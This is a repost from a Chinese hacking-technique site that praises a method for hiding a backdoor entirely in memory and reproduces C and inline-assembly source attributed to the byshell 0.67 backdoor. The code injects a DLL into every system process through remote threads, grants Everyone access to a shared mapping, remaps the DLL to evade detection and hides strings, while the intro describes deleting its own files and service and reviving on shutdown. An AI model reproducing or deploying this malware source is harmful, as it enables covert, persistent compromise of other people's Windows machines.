记录黑客技术中优秀的内容, 传播黑客文化,分享黑客技术精华

一个不错的隐藏后门思路

2014-03-31 16:05
一个不错的思路隐藏后门,利用线程注射DLL到系统进程,解除DLL映射,并删除自身DLL和EXE文件,删除自身创建的服务,仅仅存在于内存中。于是在寄主机器上无法找到任何新增服务项,磁盘文件或者是进程空间里的不明DLL。关机时,该程序会截获关机的调用,在系统关闭之前恢复自己。缺点是不正常重启之后后门消失..... 
 
 
以下代码引自byshell0.67,你可以从Xfocus上获取源代码(baiyuanfan大侠的作品撒~)一直没看过后门那些东西的,今天别人提到,没想到有这么不错的东西啊...... 
 
 

void injcode(){HANDLE prohandle;DWORD pid=0;int ret;int tmp;HANDLE fm;

//SE_DEBUG_NAME

HANDLE hToken;OpenProcessToken(GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES,&hToken);TOKEN_PRIVILEGES tp;tp.PrivilegeCount = 1;

LookupPrivilegeValue(NULL, SE_DEBUG_NAME, &tp.Privileges[0].Luid);tp.Privileges[0].Attributes=SE_PRIVILEGE_ENABLED;

AdjustTokenPrivileges(hToken,0,&tp, sizeof(tp),0,0);

//retrive pid from toolhelp32

Sleep(1000);

HANDLE snapshot;snapshot=CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS,0);

struct tagPROCESSENTRY32 processsnap; processsnap.dwSize=sizeof(tagPROCESSENTRY32);

ret=(int)CreateMutex(0,0,"by067clean");

if(!ret){MessageBox(0,0,0,0);goto err1;}

ret=(int)CreateMutex(0,0,"by067revive");

if(!ret){MessageBox(0,0,0,0);goto err1;}

ret=(int)CreateEvent(0,0,1,"by067check");//初始status设置1!切记

if(!ret){MessageBox(0,0,0,0);goto err1;}

fm=CreateFileMapping((HANDLE)-1,0,PAGE_READWRITE,0,1024,"by067filemapping");

if(!fm){MessageBox(0,0,0,0);goto err1;}

//filemapping权限要设置为任何人可读写

PACL pdacl;

PACL pnewdacl;

PSECURITY_DESCRIPTOR psd;

EXPLICIT_ACCESS ace;

int ret1;

GetSecurityInfo(fm,SE_KERNEL_OBJECT,DACL_SECURITY_INFORMATION,0,0,&pdacl,0,&psd);

ace.grfAccessPermissions=GENERIC_ALL;

ace.grfAccessMode=GRANT_ACCESS;

ace.grfInheritance=NO_INHERITANCE;

ace.Trustee.pMultipleTrustee=0;

ace.Trustee.MultipleTrusteeOperation=NO_MULTIPLE_TRUSTEE;

ace.Trustee.TrusteeForm=TRUSTEE_IS_NAME;

ace.Trustee.TrusteeType=TRUSTEE_IS_GROUP;

ace.Trustee.ptstrName="EVERYONE";

SetEntriesInAcl(1,&ace,pdacl,&pnewdacl);

ret1=SetSecurityInfo(fm,SE_KERNEL_OBJECT,DACL_SECURITY_INFORMATION,0,0,pnewdacl,0);

if(ret1){goto err2;}

//char injexe[]="explorer.exe";//for dbg only process

for(Process32First(snapshot,&processsnap);Process32Next(snapshot,&processsnap);){

//if(stricmp(processsnap.szExeFile,injexe)){continue;}

if(processsnap.th32ProcessID<10){continue;}

if(!stricmp(processsnap.szExeFile,MAINPROC1)){injapistr.ismainthread=1;}

else if(!stricmp(processsnap.szExeFile,MAINPROC2)){injapistr.ismainthread=2;}

else{injapistr.ismainthread=0;}

pid=processsnap.th32ProcessID;



//inj

prohandle=OpenProcess(PROCESS_ALL_ACCESS,1,pid);

if(ReadProcessMemory(prohandle,(void*)0x19850000,&tmp,4,(DWORD*)&ret)==1){continue;}

//已经装载了byshell一次?不做动作

DWORD WINAPI injfunc(LPVOID);

HMODULE hModule;LPVOID paramaddr;

hModule=LoadLibrary("kernel32.dll");

injapistr.myLoadLibrary=(struct HINSTANCE__ *(__stdcall *)(const char *))GetProcAddress(hModule,"LoadLibraryA");

injapistr.myGetProcAddress=(FARPROC (__stdcall*)(HMODULE,LPCTSTR))GetProcAddress(hModule,"GetProcAddress");

injapistr.myVirtualAlloc=(void *(__stdcall *)(void *,unsigned long,unsigned long,unsigned long))GetProcAddress(hModule,"VirtualAlloc");

injapistr.myFreeLibrary=(int (__stdcall *)(struct HINSTANCE__ *))GetProcAddress(hModule,"FreeLibrary");

injapistr.myIsBadReadPtr=(int (__stdcall *)(const void *,unsigned int))GetProcAddress(hModule,"IsBadReadPtr");

injapistr.myVirtualFree=(int (__stdcall *)(void *,unsigned long,unsigned long))GetProcAddress(hModule,"VirtualFree");

paramaddr=VirtualAllocEx(prohandle,0,sizeof(injapistr),MEM_COMMIT|MEM_RESERVE,PAGE_EXECUTE_READWRITE);

ret=WriteProcessMemory(prohandle,paramaddr,&injapistr,sizeof(injapistr),0);

void* injfuncaddr=VirtualAllocEx(prohandle,0,20000,MEM_COMMIT|MEM_RESERVE,PAGE_EXECUTE_READWRITE);

ret=WriteProcessMemory(prohandle,injfuncaddr,injfunc,20000,0);

ret=(int)CreateRemoteThread(prohandle,0,0,(DWORD (WINAPI *)(void *))injfuncaddr,paramaddr,0,0);

if(!ret){int tmp=GetLastError();

#ifdef bydbg

OutputDebugString("cannot infect process:see pid in edx,err code in eax\n");

__asm mov eax,tmp

__asm mov edx,pid

__asm int 3;

#endif

}

CloseHandle(prohandle);



}//end for





CloseHandle(snapshot);

return;



{

err1:

#ifdef bydbg

OutputDebugString("create global obj failed\n");

__asm int 3;

#endif

return;

}

{

err2:

#ifdef bydbg

OutputDebugString("cannot set DACL of section,see err code in eax\n");

__asm mov eax,ret1

__asm int 3;

#endif

return;

}

}





DWORD WINAPI injfunc(LPVOID paramaddr){



char ntboot[16];char msgbox[16];

INJAPISTR * pinjapistr=(INJAPISTR *)paramaddr;

__asm{

mov ntboot,’n’

mov ntboot 1,’t’

mov ntboot 2,’b’

mov ntboot 3,’o’

mov ntboot 4,’o’

mov ntboot 5,’t’

mov ntboot 6,’.’

mov ntboot 7,’d’

mov ntboot 8,’l’

mov ntboot 9,’l’

mov ntboot 10,0



mov msgbox,’C’

mov msgbox 1,’m’

mov msgbox 2,’d’

mov msgbox 3,’S’

mov msgbox 4,’e’

mov msgbox 5,’r’

mov msgbox 6,’v’

mov msgbox 7,’i’

mov msgbox 8,’c’

mov msgbox 9,’e’

mov msgbox 10,0

}

HMODULE hModule=pinjapistr->myLoadLibrary(ntboot);

if((int)hModule!=0x19850000){return 0;}//特殊情况

DWORD (WINAPI *myCmdService)(LPVOID);

myCmdService=(DWORD (WINAPI *)(LPVOID))(pinjapistr->myGetProcAddress(hModule,msgbox));



unsigned int memsize=0;

void * tempdll=pinjapistr->myVirtualAlloc(0,DLLIMAGESIZE,MEM_COMMIT|MEM_RESERVE,PAGE_EXECUTE_READWRITE);

memcpy(tempdll,hModule,DLLIMAGESIZE);

pinjapistr->myFreeLibrary(hModule);

hModule=(HMODULE)pinjapistr->myVirtualAlloc(hModule,DLLIMAGESIZE,MEM_COMMIT|MEM_RESERVE,PAGE_EXECUTE_READWRITE);

memcpy(hModule,tempdll,DLLIMAGESIZE);pinjapistr->myVirtualFree(tempdll,DLLIMAGESIZE,MEM_DECOMMIT);

//



myCmdService((void*)(pinjapistr->ismainthread));

return 0;



}

 


知识来源: www.2cto.com/Article/201403/289528.html

阅读:63524 | 评论:0 | 标签:后门

想收藏或者和大家分享这篇好文章→复制链接地址

“一个不错的隐藏后门思路”共有0条留言

发表评论

姓名:

邮箱:

网址:

验证码:

公告

关注公众号hackdig,学习最新黑客技术

推广

工具

标签云